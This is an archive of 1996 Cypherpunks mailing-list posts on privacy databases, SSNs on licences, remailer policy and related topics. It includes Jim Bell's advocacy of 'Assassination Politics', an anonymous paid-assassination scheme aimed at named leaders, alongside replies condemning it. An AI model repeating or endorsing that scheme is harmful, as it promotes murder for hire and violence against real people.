Perhaps this is not yet anonymous digital cash, but certainly > anonymous. 
[Now someone is going to propose keeping a database of all > sides of beef, and steganographically watermarking the meat in the > context of digitally signed scannable grade-stamps. Perhaps the next > step in monitoring the private drug-meat trade would be to escrow the > inspectors' private keys, derived from the product of two U.S. Primes, > and put the database up on the net: the T-bone connected to the > M-bone, etc.? PGN] Did you ever see one of those mattress tags which reads something like "removal of this tag is a violation of ..... and is punishable by ..."? They could tag the stuff, then make it a violation of law to cut the meat before final consumption. The IRS is very concerned about barter, and besides, how are you gonna go half way on legislating against untraceable barter (other than to prohibit dividing the beef)? From dthorn at gte.net Sat Sep 21 12:19:06 1996 From: dthorn at gte.net (Dale Thorn) Date: Sun, 22 Sep 1996 03:19:06 +0800 Subject: DL in exchange for fingerprint In-Reply-To: Message-ID: <324415D5.24E7@gte.net> Kurt Vile wrote: > >By the way, the next rev of the California driver's license will > >reportedly have one's *Social Security Number* printed on the card! > >So much for the statement clearly printed on my card: > Illinois already has such a law, in fact you must have an SSN to > even get a DL. Fortunately, the law allows a citizen-unit to choose > if they want their SSN on their DL (imagine that, a choice!) - the > flip side is that you have to specifically ask them not to print > them - they won't ask you. > One would hope that CA's law might provide a similar out... Oh, yeah. This "optional" SSN is a great idea, yeah. So late at night, you get pulled over, and the officer notes that YOU (one of less than a thousand people who don't have the DL-SSN) don't actually have the DL-SSN. Well, just don't get pulled over.... 
From jimbell at pacifier.com Sat Sep 21 12:19:31 1996 From: jimbell at pacifier.com (jim bell) Date: Sun, 22 Sep 1996 03:19:31 +0800 Subject: Kiddie porn on the Internet Message-ID: <199609211655.JAA21404@mail.pacifier.com> At 04:33 PM 9/16/96 -0400, hallam at ai.mit.edu wrote: > >>Yet another obligatory AP (Assassination Politics) reference: If a person >>is really interested in helping out "starving children" he may be able to do >>far more good by purchasing the death of the local tyrant(s), rather than >>(just) buying more food. > > >The problem is that assasination rarely leads to the installation of >a government that is any better. In most cases it gets worse. There is an enormous difference in significance between the following two scenarios: 1. Tyrant A, speaking outside, gets struck by a meteorite and is instantly killed. He is immediately replaced by his second-in-command. 2. Tyrant B is told that he has been threatened with a meteorite strike by an opponent in an hour if he goes on with his speech, he ignores the "unbelievable" warning, and dies on schedule, just as he was warned, struck by a meteorite. What should his vice-thug do in THIS case?!? Physically, the same thing happened: Big boom. But the implications are vastly different. Incident 1 looks like a freak of nature that's unlikely to be repeated. It leads to very few policy changes or changes in precautions. It was a fluke. Incident 2 looks like somebody has developed a new weapon of practically supernatural capabilities. This difference is why I scoff at your attempts to equate political assassination in the past with what will be accomplished in the future. (other people have made this mistake as well; it's a common misunderstanding.) In the past, assassinations have often led to worse replacements, but that is because there is no likely prospect that the assassination will be repeated, as many times as needed, until the job is done. 
Partly that's because assassinations were often seen to be the work of "lone nuts" (who don't come around all that often), or because they were done by the very people who take over. In either case, the prospects of a repeat are rather low. As anyone who really understands my AP theory recognizes, getting rid of an unwanted leader will become so easy and cheap (on a per-citizen basis) that nobody would dare take the job who angered more than a tiny fraction of the population. A "worse" government would simply never be formed, unless they were suicidal. >In the past the US excuse for supporting bloodthirsty murderers like >Pinochet, Saddam, Marcos and Noriega was that the alternative was >worse. The _truth_, however, is that the alternative was worse...for the US government. It's really very simple: Let me draw an analogy. Modern organophosphate pesticides were initially developed by German chemists in the 1930's. These materials are closely related to Sarin, the well-known nerve agent that killed people in the Tokyo subway attack over a year ago. It turns out that Sarin is a rather simple molecule. Why not use it to kill bugs? Well, it kills bugs just fine. The problem, of course, is that it kills farmers just as well. Since you presumably don't want to do that, you have to go to all the trouble to find compounds that kill bugs, but are as non-toxic as possible to farmers. And if you look at the description of the contents of modern organophosphate pesticides on the bottles, you see names that only a chemist could possibly pronounce, names so long (because their molecules were so complex) that you often have to take a breath in the middle to recite. These compounds were found by individually synthesizing thousands, or even tens of thousands of compounds, and testing each one. Individually. Eventually, they found compounds which were as toxic to bugs as Sarin is to humans, but were far less toxic to humans. They found the needle in the haystack. 
Likewise, as I've discovered through AP, it will be easy to get rid of tyrants. The exquisitely difficult task is to get rid of ONLY SOME of the tyrants, for example Saddam Hussein, Moammar Khadafi, etc, and leaving most of the rest behind. _THAT'S_ the tricky part. I have the easy task: describing a system to get rid of them all, with no exceptions. But that's the system that nobody in the leadership of any current country wants to see. That is why you won't see Clinton announcing that he's going to use my idea to get rid of Saddam Hussein, and instead will waste hundreds of millions or even billions of dollars in a failed bid to eject the thug. Doesn't that make you feel a lot safer? Jim Bell jimbell at pacifier.com From mrm at netcom.com Sat Sep 21 12:27:37 1996 From: mrm at netcom.com (Marianne Mueller) Date: Sun, 22 Sep 1996 03:27:37 +0800 Subject: job testing SSL Message-ID: <199609211702.KAA09826@netcom20.netcom.com> We're looking for someone who can test an SSL implementation in Java. If you're interested send a resume or a URL either to me or to the group. My email is mrm at eng.sun.com, the group gets resumes at jeeves-jobs at goa.eng.sun.com. If you're interested in the context, see http://java.sun.com/products/jeeves. If you're Perry and you want to flame me send email to mrm at eng.sun.com :-) Marianne http://java.sun.com/people/mrm/ From aba at dcs.ex.ac.uk Sat Sep 21 12:50:55 1996 From: aba at dcs.ex.ac.uk (Adam Back) Date: Sun, 22 Sep 1996 03:50:55 +0800 Subject: CIA hacked In-Reply-To: <1oykuD14w165w@bwalk.dm.com> Message-ID: <199609211305.OAA00455@server.test.net> Dimitri Vulis writes: > > [email reply protesting spam] > > You are confused. The above question was e-mailed to me by one of > Timmy May's friends. What you were doing was confusing... how about attributing what people have said to you, in the standard way? I was unsure what was going on until you clarified here. 
Instead of including all the headers in there with just a space between your headers and the quoted headers (which makes it hard to follow, and makes one wonder if someone is trying a crude forgery), use standard quoting conventions: Joe Blogss writes in private email: > [quoted message body]... or similar? > I just forward their e-mail to this mailing list. I don't read it. Has it occurred to you that most of the email you have been receiving (and posting here) is as a result of the said same habit, and people's predictable misunderstanding of what you were doing? I would suggest that if you don't want to read what people email to you, kill file them, or delete their email, or ask them in email not to send you email, but don't forward it here! > If you have any comments about Timmy May's friends not knowing > English, trying to insult people, and posting non-crypto-relevant > political rants, address them to Timmy May and his friends. It would seem to me that the first insults were thrown by yourself, and that your strange habit of bouncing all the fallout to the list is perpetuating the problem. Could you stop doing this? Some of us read cpunks on pay per second phone lines, and so on. If you are concerned about non-crypto-relevant political rants, how about generating some more signal. I see you are posting the items with the [NEWS] tag, and these look relevant, and useful, I read a few of them myself. If reporting to the list is accurate, I hear you have a PhD with a subject related to crypto, so presumably you would have ample knowledge to contribute technical crypto related thoughts. I'm sure people would be interested in anything along those lines you cared to contribute, and your reputation would benefit, Think about it, Adam -- #!/bin/perl -sp0777i I've been reading articles about the recent flap over Lexis-Nexis' P-TRAK database with interest.
A recent Associated Press article said that the lines at Lexis-Nexis have been jammed with individuals requesting they be removed from the database. Lexis-Nexis is certainly not the only database of its kind, but it has certainly generated quite a bit of attention and panic. In terms of cypherpunk goals, I think this is a positive development. It demonstrates ever-so-clearly that the average "Joe Schmoe" does not follow the government line that privacy and security are mutually exclusive concepts. Rather, there is an instinctive recognition that privacy and security are inextricably linked. Only when the government pulls on emotional (as opposed to logical) strings by pulling out the "if you only knew what we knew" & "if it saves just one life" arguments does the easily swayed public get pulled in the other direction. The flap over P-TRAK repudiates arguments by Freeh and others that American citizens want to give up their freedoms in the interest of security. If you are in a position to influence government policy (ie. Jim Ray with Judge Kozinski, EFF personages involved in the Bernstein case, PRO-CODE advocates, et al.), then keep these clippings handy. Here is a concrete example that our government and law-enforcement leaders are woefully out of touch with average citizens (not to mention reality!). The leap from P-TRAK to GAK is not that large in the so-called court of public opinion. Sometimes monkey-wrenching is as simple as pointing out the obvious. me _______________________________________________________________ Omegaman PGP Key fingerprint = 6D 31 C3 00 77 8C D1 C2 59 0A 01 E3 AF 81 94 63 Send e-mail with "get key" in the "Subject:" field to get a copy of my public key _______________________________________________________________ From dsmith at prairienet.org Sat Sep 21 13:18:44 1996 From: dsmith at prairienet.org (David E. Smith) Date: Sun, 22 Sep 1996 04:18:44 +0800 Subject: ANYONES CREDIT CARD # per your request.
Message-ID: <199609211740.MAA09483@bluestem.prairienet.org> -----BEGIN PGP SIGNED MESSAGE----- Mime-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit To: cypherpunks at toad.com Date: Sat Sep 21 12:32:13 1996 > > > Note: Lexis-Nexis is only accepting written or fax requests. You > have the > > > option to fax your removal request to (513) 865-1930 state your full > name > > > and complete address. Or mail the request to: > > > Lexis-Nexis > > > Attn: P-Track > > > P.O. Box 933 > > > Dayton, Ohio > > > 45401-0933 According to the 800 number, you may also be removed from their database by sending a letter to p-trak at prod.lexis-nexis.com. You need to send your name and address, and probably your Citizen- Unit Social Insecurity Number. dave - ----- David E. Smith, P O Box 324, Cape Girardeau MO USA 63702 dsmith at prairienet.org http://www.prairienet.org/~dsmith send mail with subject of "send pgp-key" for my PGP public key "The world's at stake. Don't confuse me with details." -- Captain America, "Onslaught" ... famous last words From hallam at vesuvius.ai.mit.edu Sat Sep 21 13:18:56 1996 From: hallam at vesuvius.ai.mit.edu (hallam at vesuvius.ai.mit.edu) Date: Sun, 22 Sep 1996 04:18:56 +0800 Subject: Kiddie porn on the Internet In-Reply-To: <199609211655.JAA21404@mail.pacifier.com> Message-ID: <9609211734.AA15897@vesuvius.ai.mit.edu> [AP drivel deleted] Go talk to someone who is a member of an organisation like the PLO or Hammas and pretty near the top.
If you think that they would be intimidated for a moment by AP you have another think coming. If it could the US would have assassinated Saddam by now. It can't because it is too difficult to find out where exactly a person will be. Assassination attempts against Castro similarly failed. If you care to look at the history of Cambodia you will see that Lon Nol assumed the presidency despite the knowledge that there was practically no chance of defeating the Khmer Rouge and that he would almost certainly be dead in less than a week as a result. Both the assumptions AP rests on are utterly false. It is neither possible to assassinate people at will nor will it intimidate. In addition *ANYONE* who attempted to implement AP would be someone *I* would regard as a tyrant and therefore a legitimate target by the rules of AP. I would naturally consider it permissible to engage the support of others in their suppression. Since we now live in the fantasy land of AP I can now wipe out anyone anywhere so I eliminate all AP leaders. I think that this type of talk is incredibly dangerous. There are plenty of people on the net who are psychos and if you spread AP drivel around someone is going to act on it. Probably not Jim Bell, more likely a psychopath who lurks on the list but does not post. If you call for people to be murdered - and let us not forget that this is what AP is about - you bear the responsibility when someone acts on it. I consider AP to be very close to calling for the assassination of the President of the USA. That is a federal crime and there is a law that requires the investigation of any such threats. I suggest that people think *very* carefully before engaging in this dangerous nonsense any further. Phill PS it is not censorship to stop people from advocating murder.
From usura at replay.com Sat Sep 21 13:18:56 1996 From: usura at replay.com (Alex de Joode) Date: Sun, 22 Sep 1996 04:18:56 +0800 Subject: WinSock Remailer Version ALPHA 1.3 Now Available Message-ID: <199609211811.UAA29737@basement.replay.com> Remo Pini (rp at rpini.com) wrote: : To: cypherpunks at toad.com : Date: Thu Sep 19 09:07:16 1996 : Has it already been exported by some sinister anonymous? If so, where? ftp.replay.com:/pub/replay/pub/remailer/wsa13.zip where else ...? -- Alex de Joode | Replay IP Service & Web DZign -- The Netherlands usura at replay.com | http://www.replay.com mailto:info at replay.com From chen at chen.com Sat Sep 21 14:18:26 1996 From: chen at chen.com (Mark Chen) Date: Sun, 22 Sep 1996 05:18:26 +0800 Subject: How's the list? In-Reply-To: <199609210245.TAA22366@slack.lne.com> Message-ID: <9609211924.AA00422@pela.chen.com.> Eric Murray writes: > Phil Fraering writes: > > > * I'm now working part of the time at a company that has a lot of > > mail-order sales; are any of you aware of how much credit card fraud is > > going on out there right now? > > No, how much? About twenty basis points with respect to dollar volume. -- Mark Chen 415/341-5539 chen at chen.com D4 99 54 2A 98 B1 48 0C CF 95 A5 B0 6E E0 1E 1D From loki at infonex.com Sat Sep 21 14:41:21 1996 From: loki at infonex.com (Lance Cottrell) Date: Sun, 22 Sep 1996 05:41:21 +0800 Subject: "Remailers can't afford to be choosy" In-Reply-To: Message-ID: One important differentiation to make is filtering on form vs. filtering on content. Most if not all remailers have clear usage guidelines. These indicate several form restrictions on what messages the remailer is offering to transmit. These restrictions may be on message size, instruction formatting, number of destinations for one message, or number of identical messages. These restrictions are no more censorship than restricting messages to SMTP compliant ascii. 
Where people do not follow the stated rules, I take action to enforce them. Either by source blocking the abuser if known, destination blocking the destination, or trying to apply public pressure. I think all these actions are completely reasonable, given that the proper use guidelines were clearly defined up front. It is similar to putting up a fence around your yard when people start hanging out there uninvited. Of necessity most remailers also restrict some content. This is very difficult to enforce, but is generally done for legal reasons. I restrict illegal and harassing posts. Since I don't see the content, these provisions are largely unenforced. Are you suggesting that I not take perfectly legal and open actions to enforce the public statement of allowed uses of my remailer? -Lance ---------------------------------------------------------- Lance Cottrell loki at obscura.com PGP 2.6 key available by finger or server. Mixmaster, the next generation remailer, is now available! http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche ---------------------------------------------------------- From lharrison at csbh.mhv.net Sat Sep 21 14:45:11 1996 From: lharrison at csbh.mhv.net (Lynne L. Harrison) Date: Sun, 22 Sep 1996 05:45:11 +0800 Subject: ANYONES CREDIT CARD # per your request. Message-ID: <1.5.4.16.19960921192852.2cd71ece@pop.mhv.net> At 12:40 PM 9/21/96 -0500, David E. Smith wrote: > >According to the 800 number, you may also be removed from >their database by sending a letter to p-trak at prod.lexis-nexis.com. >You need to send your name and address, and probably your Citizen- >Unit Social Insecurity Number. True. You *do* have to give your Social Insecurity Number ["SIN"(tm)]. 
While they have discontinued publishing SIN's, they have them in their databanks and require you to state it as their way of "verifying" that it is the "real" you making the request to be removed. ************************************************************ Lynne L. Harrison, Esq. | "The key to life: Poughkeepsie, New York | - Get up; lharrison at mhv.net | - Survive; http://www.dueprocess.com | - Go to bed." ************************************************************ DISCLAIMER: I am not your attorney; you are not my client. Accordingly, the above is *NOT* legal advice. From mcguirk at indirect.com Sat Sep 21 15:13:27 1996 From: mcguirk at indirect.com (Dan McGuirk) Date: Sun, 22 Sep 1996 06:13:27 +0800 Subject: Where to write crypto? Message-ID: If I want to go to a country outside the United States to write cryptographic code that will be freely distributable, what's the best place to go? From jamesd at echeque.com Sat Sep 21 15:27:34 1996 From: jamesd at echeque.com (James A. Donald) Date: Sun, 22 Sep 1996 06:27:34 +0800 Subject: timmy waxes a widdle on AP Message-ID: <199609211946.MAA27996@dns2.noc.best.net> At 08:11 PM 9/17/96 -0700, Vladimir Z. Nuri wrote: > but I'm still a bit confused about those prices. what determines > them, anyway? risk to the assassin? it seems that it ought to be > as easy to snuff out one person as it would another. e.g. everybody > walks alone out at night at different times, it seems. Although government services to the rich and poor cost about the same, the quality is radically different. Thus the risk involved in killing a poor person is vastly less than the risk involved in killing a middle class person. 
This is most noticeable in education, where black children are kept in holding pens with leaky roofs, masquerading as schools, for a cost that would suffice to build classrooms with a hot tub in each classroom and a pentium on every desk, even if we burnt the classroom down with the equipment inside every year and replaced it every year. On the other hand, food, clothing, and transport, being provided for money by the free market, tend to be roughly equal for rich and poor. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From jamesd at echeque.com Sat Sep 21 15:36:09 1996 From: jamesd at echeque.com (James A. Donald) Date: Sun, 22 Sep 1996 06:36:09 +0800 Subject: Quantum Computers Message-ID: <199609211946.MAA28008@dns2.noc.best.net> At 05:09 AM 9/18/96 -0400, Rick Osborne wrote: > I'm sorry if I seem to be making light of a very serious topic, but, last > time I checked, computers don't have a reverse. Quantum computers *do* have a reverse. Indeed even when operated in classical mode they *still* have a reverse. A quantum computer is a reversible computer operated at very high speed and very low energy. Reversible computers were invented before quantum computers. Reversible computers were invented in order to demonstrate that there was no lower limit to the energy required to perform certain computational tasks. Later people speculated, and very recently demonstrated that a reversible computer operated in the quantum regime could do things that no classical computer could do. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are.
True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From alano at teleport.com Sat Sep 21 15:50:05 1996 From: alano at teleport.com (Alan Olsen) Date: Sun, 22 Sep 1996 06:50:05 +0800 Subject: [Noise] anonymous bacon Message-ID: <3.0b16.32.19960921133449.00684550@mail.teleport.com> At 09:28 AM 9/21/96 -0700, Dale Thorn wrote: >Jonathan Corbet wrote: [Government Access to Meat stuff from Risks deleted] > >Did you ever see one of those mattress tags which reads something like >"removal of this tag is a violation of ..... and is punishable by ..."? >They could tag the stuff, then make it a violation of law to cut the >meat before final consumption. The IRS is very concerned about barter, >and besides, how are you gonna go half way on legislating against >untraceable barter (other than to prohibit dividing the beef)? And meat tenderizers would be outlawed, because it would be viewed as an effort to obscure the markings. (You could be sent to jail for beating your meat!) Think of the legal liability for selling someone meat that is later involved with the drug trade! The way the laws are going, you could lose everything for selling a steak to a known drug user. Soon you would have meat market laws similar to the alcohol laws in Utah. You will have to eat the steak on the premises, in front of a government authorized and licensed vendor. (Until the cholesterol police make meat consumption a crime.) Soon we will have gangs fighting over the illegal meat trade. Meat will be murder! Instead of "drive-ins", we will have "drive-bys". Government will have an even bigger reason to put a steak through our civil rights. Our goose will be cooked! Then people will go to trading vegetables and grain. And all the "honest folks" will be left with nothing to eat but rocks. (Until, those too are banned because someone might throw one...) --- | "Remember: You can't have BSDM without BSD." 
- alan at ctrl-alt-del.com | |"The moral PGP Diffie taught Zimmermann unites all| Disclaimer: | | mankind free in one-key-steganography-privacy!" | Ignore the man | |`finger -l alano at teleport.com` for PGP 2.6.2 key | behind the keyboard.| | http://www.teleport.com/~alano/ | alano at teleport.com | From blackart at ctrl-alt-del.com Sat Sep 21 16:15:48 1996 From: blackart at ctrl-alt-del.com (Black Art) Date: Sun, 22 Sep 1996 07:15:48 +0800 Subject: Going AP Shit on the Internet Message-ID: <3.0b16.32.19960921133414.0069a754@www.ctrl-alt-del.com> At 01:34 PM 9/21/96 -0400, hallam at vesuvius.ai.mit.edu wrote: > >[AP drivel deleted] > > [Examples of where AP would fail deleted] > >Both the assumption AP rests on are utterly false. It is neither possible >to assasinate people at will nor will it intimidate. > >In addition *ANYONE* who attempted to implement AP would be someone *I* >would regard as a tyrant and therefore a legitimate target by the rules >of AP. I would naturally consider it permissable to engage the support of >others in their suppression. Since we now live in the fantasy land of AP >I can now wipe out anyone anywhere so I eliminate all AP leaders. I'd buy that for a dollar! I would expect that only a small portion of the "targets" on an actual AP system would be political figures. People have a far broader range of people they would like to see eliminated. How many "hits" would John Tesh have gotten after the Olympics? How many "hits" would Urkel get after anyone actually watched him on TV? These powers could be used for good or evil! People do not just want to kill politicians. Many of them would like to kill people they find annoying in their general lives. TV stars. Advertising executives. Bosses. Bill Gates. Brings stalking to a new level! Say a company came out with an Internet browser that was considered the "market leader". 
A less scrupulous competitor (who has a large company and lots of cash) could afford to have key personnel off-ed as a part of "doing business". (And it would not have to be the figureheads. Less well-known people in charge of key areas, like security could be off-ed.) Is your job important to KILL FOR? They could even hide it in the sales and promotion budget. It could change the face of business forever! Who do you want to kill today? There is no mechanism to assure that AP is used for only the people that Mr. Bell would like to see killed. If it is implemented, then EVERYONE is a target. >I think that this type of talk is incredibly dangerous. There are plenty of >people on the net who are psychos and if you spread AP drivel arround someone >is going to act on it. Probably not Jim Bell, more likely a psychopath who >lurks on the list but does not post. Actually, I would expect that the various government agencies would do their best to track down those trying to implement such a system. Governments do not take competition lightly. The odds of getting a real hit man are also small. The FBI has agents who frequently pose as hit men for the sole purpose of tracking down those who want to eliminate their friends and neighbors. Only organized crime and government have easy access to assassination. ("Government Access to assassination" Escrow anyone?) >If you call for people to be murdered - and let us not forget that this is >what AP is about you bear the responsibility when someone acts on it. I do not think that Mr. Bell is willing to examine the moral consequences of the things that he advocates. (He would get alot more respect from me if he would own up to it and admit he is wanting to see mass murder for hire.) There seems to be a big blind spot here. It would also be a great excuse for the bluenoses who want to regulate the net into extinction. (Advocating murder is not taken well in our society, even if the targets deserve it.) 
>I consider AP to be very close to calling for the assasination of the >President of the USA. That is a federal crime and there is a law that >requires the investigation of any such threats. I suggest that people >think *very* carefully before engaging in this dangerous nonsense any >further. Facilitating the murder of others through hiring of hit men is illegal no matter who the target is. I wonder how he would find a service provider that would dare host the site. I know of no "data haven" that would risk having a murder for hire server anywhere near their site. They would find their feed cut pretty quick or feel the sting of legal liability or both. (Part of being a "data haven" is not to attract attention to yourself. The first rule of not being seen is "Don't stand up".) >PS it is not censorship to stop people from advocating murder. I disagree with this conclusion. It IS censorship. The only thing that seems to change it is the subject matter. If it was changed to "it is not censorship to stop people from advocating cryptography" or "unrestrained sex" or "destruction of the ruling party" would you still agree? Sometimes advocating murder is considered valid. (As the various people in the media talking about how "we should have offed Husain (sp?).) How do you make the distinction. Whoever is in power this week? I think not. Besides, if you want to weed the nut cases out of society, you let them advocate such things in public. Makes it easier to cart them away before they hurt someone. (Unless they are in Government office. By then, it is too late.) ------------------------------------------------------------------------ Black Art blackart at ctrl-alt-del.com "The Government will mind its own business the day that Malcolm McDowell becomes a spokesman for Crisco." From markm at voicenet.com Sat Sep 21 16:28:00 1996 From: markm at voicenet.com (Mark M.) 
Date: Sun, 22 Sep 1996 07:28:00 +0800 Subject: [NOISE] Kiddie porn on the Internet In-Reply-To: <9609211734.AA15897@vesuvius.ai.mit.edu> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Sat, 21 Sep 1996 hallam at vesuvius.ai.mit.edu wrote: > If you call for people to be murdered - and let us not forget that this is > what AP is about you bear the responsibility when someone acts on it. So much for free speech. Do you think people distributing bomb-making material should be held responsible for any terrorist incidents. Quite a few people on this list who posted bomb-making material would be arrested. Same with chemistry book publishers and news magazines that had some pretty detailed information about pipe bombs. I fail to see any difference between the two. > I consider AP to be very close to calling for the assasination of the > President of the USA. That is a federal crime and there is a law that > requires the investigation of any such threats. I suggest that people > think *very* carefully before engaging in this dangerous nonsense any > further. Do you really consider speech to be "dangerous." The law requiring investigation of threats against the president is a stupid one. The maintainer of the exploding head page was investigated by the USSS after putting up computer-generated pictures of Bob Dole's head exploding (Presidential candidates are also covered under this law). There's too much potential for abuse. > PS it is not censorship to stop people from advocating murder. Then all prosecuters pushing for the death penalty, death penalty advocates, and anyone who advocates going to war with another country should all be thrown in jail. I might as well ask the common question again: "What part of 'Congress shall make no law' don't you understand?" Mark - -- PGP encrypted mail prefered. 
Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ -----BEGIN PGP SIGNATURE----- Version: 2.6.3 Charset: noconv -----END PGP SIGNATURE----- From m5 at vail.tivoli.com Sat Sep 21 16:32:21 1996 From: m5 at vail.tivoli.com (Mike McNally) Date: Sun, 22 Sep 1996 07:32:21 +0800 Subject: Going AP Shit on the Internet In-Reply-To: <3.0b16.32.19960921133414.0069a754@www.ctrl-alt-del.com> Message-ID: <32445A8B.2483@vail.tivoli.com> Black Art wrote: > > How many "hits" would John Tesh have gotten after the Olympics? > > How many "hits" would Urkel get after anyone actually watched him > on TV? > > These powers could be used for good or evil! Those are examples of good uses, right? ______c_________________________________________________________________ Mike M Nally * IBM % Tivoli * Austin TX * How quickly we forget that mailto:m5 at tivoli.com mailto:m101 at io.com * "deer processing" and "data http://www.io.com/~m101/ * processing" are different! From mcguirk at indirect.com Sat Sep 21 16:43:59 1996 From: mcguirk at indirect.com (Dan McGuirk) Date: Sun, 22 Sep 1996 07:43:59 +0800 Subject: Where to write crypto? In-Reply-To: Message-ID: On Sat, 21 Sep 1996, Dan McGuirk wrote: > If I want to go to a country outside the United States to write > cryptographic code that will be freely distributable, what's the best > place to go? Or, on the other hand, is there no way that a U.S. citizen can legally do this? From tcmay at got.net Sat Sep 21 16:51:08 1996 From: tcmay at got.net (Timothy C.
May) Date: Sun, 22 Sep 1996 07:51:08 +0800 Subject: "Remailers can't afford to be choosy" Message-ID: Without going back and reviewing my precise words in my first post on this topic, I don't think Lance is doing anything unreasonable. My comment was more to the point that a lot of the talk I see about filtering topics, looking at content, blah blah blah, is basically inconsistent with the basic concept of a "digital mix," a la Chaum. At 7:19 PM 9/21/96, Lance Cottrell wrote: >One important differentiation to make is filtering on form vs. filtering on >content. Most if not all remailers have clear usage guidelines. These >indicate several form restrictions on what messages the remailer is >offering to transmit. These restrictions may be on message size, >instruction formatting, number of destinations for one message, or number >of identical messages. These restrictions are no more censorship than >restricting messages to SMTP compliant ascii. > >Where people do not follow the stated rules, I take action to enforce them. >Either by source blocking the abuser if known, destination blocking the >destination, or trying to apply public pressure. I think all these actions >are completely reasonable, given that the proper use guidelines were >clearly defined up front. It is similar to putting up a fence around your >yard when people start hanging out there uninvited. Clearly stating policies is fair enough. In the future, with a rich ecology of remailers, I would expect many kinds of remailers with many kinds of policies, prices, etc. Still, it is always useful to remember that a remailer is first and foremost a _remailer_, not an inspector of content to determine appropriateness of topics, whether a receiver "wants" a remailed message, etc. (None of the main "physical remailers," e.g., the US Postal Service, Federal Express, UPS, Airborne, etc., offer "destination-blocking" or even "source-blocking" services. Of course, they charge some form of fee for remailing. 
And there is nominally a return address (albeit easily bypassed/spoofed).) >Are you suggesting that I not take perfectly legal and open actions to >enforce the public statement of allowed uses of my remailer? No. I think clearly stated policies are perfectly legit. What I was getting at with my "remailers can't afford to be choosy" point was a more general point that sometimes seems to get lost in the discussions, namely, that remailers will, perforce, be used for lots of unpopular, disgusting, flamish, etc. uses. Not all remailer uses are noble whisteblowings (*). (* In fact, some whistleblowings are amongst the most "most illegal" uses! The person within General Dynamics who uses a remailer to describe contract fraud in the Tomahawk Cruise Missile program is almost certainly putting the remailer operator under intense pressure, just as is a person using a remailer to post the Church of Scientology NOTS documents. To me, they are the same. Hence, "remailers can't afford to be choosy.") --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From tcmay at got.net Sat Sep 21 17:24:58 1996 From: tcmay at got.net (Timothy C. May) Date: Sun, 22 Sep 1996 08:24:58 +0800 Subject: Death Threats Message-ID: (I don't know what the hell this thread has to do with "[NOISE] Kiddie porn on the Internet," so I've changed the name.) At 9:22 PM 9/21/96, Mark M. wrote: >Do you really consider speech to be "dangerous." The law requiring >investigation of threats against the president is a stupid one. 
The maintainer >of the exploding head page was investigated by the USSS after putting up >computer-generated pictures of Bob Dole's head exploding (Presidential >candidates are also covered under this law). There's too much potential for >abuse. Hey, I'm a candidate for President, too (at least I know of someone who plans to vote for me). Does this mean I am protected against various threats, and veiled threats? Let me know, as I seem to be under attack by certain Russian-developed spambots. More seriously, the whole set of protections the President has is inconsistent with our nominally anti-royalist approach. Of course, America long ago created its own royalty. Even dynasties (how else do you explain Teddy Kennedy getting away with the Mary Jo Kopechne thing?). Actively (and plausibly) threatening _anyone_ is a kind of crime (*), but there is no reason to make special laws covering certain persons. (* Why do I say "actively (and plausibly) threatening _anyone_ is a kind of crime"? Don't I believe in free speech? Well, if I hear that Vladimir G. Nulis says I should be killed, and that he is coming to California to take care of this, I have no compunctions, liberrarian or otherwise, about shooting first at the first sign of his appearance on my property. Understandably, the government does not wish this to happen. Thus, I have no problem with illegalizing direct and concrete threats. General threats, such as "all lawyers should be taken out into the parking lot and garotted" are not specific, direct, and concrete, and hence fall under the free speech provisions.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. 
May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From loki at infonex.com Sat Sep 21 17:37:14 1996 From: loki at infonex.com (Lance Cottrell) Date: Sun, 22 Sep 1996 08:37:14 +0800 Subject: Macintosh Mixmaster port... Who's doing it? In-Reply-To: Message-ID: At 11:57 AM -0700 9/18/96, Myers W. Carpenter wrote: > Does anyone have any idea who might be attempting a Macintosh >Mixmaster port? I and some other people were eyeing the idea. If you know >who might be doing this port I would appreciate hearing from them. > Thanks. > myers Several individuals have offered to port Mixmaster. To the best of my knowledge, none are still working on it. As the author and a Mac user I would be happy to answer questions, and test the system. I have no Mac programing experience though. -Lance ---------------------------------------------------------- Lance Cottrell loki at obscura.com PGP 2.6 key available by finger or server. Mixmaster, the next generation remailer, is now available! http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche ---------------------------------------------------------- From alano at teleport.com Sat Sep 21 18:19:00 1996 From: alano at teleport.com (Alan Olsen) Date: Sun, 22 Sep 1996 09:19:00 +0800 Subject: CNET Digital Dispatch Vol. 2 No. 38 Message-ID: <3.0b16.32.19960921155903.00c51bac@mail.teleport.com> The individual who posted the C-Net top ten missed the crypto-related parts of that issue. (I guess the humor section is all that people read on C-Net...) Here is what he missed... 
